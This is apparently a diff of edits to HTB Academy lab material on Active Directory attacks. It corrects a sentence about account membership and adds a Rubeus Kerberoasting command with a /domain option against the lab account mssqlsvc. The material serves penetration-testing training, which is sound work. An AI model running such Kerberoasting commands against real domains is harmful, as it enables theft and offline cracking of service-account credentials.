HTB Academy - Active Directory Enumeration and Attacks

 - To enumerate the account membership, select

-as well.
+memberofas well.

-Then, Kerberoast the user with Rubeus
+Then, Kerberoast the user with Rubeus, but pass in the /domain option:

 .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap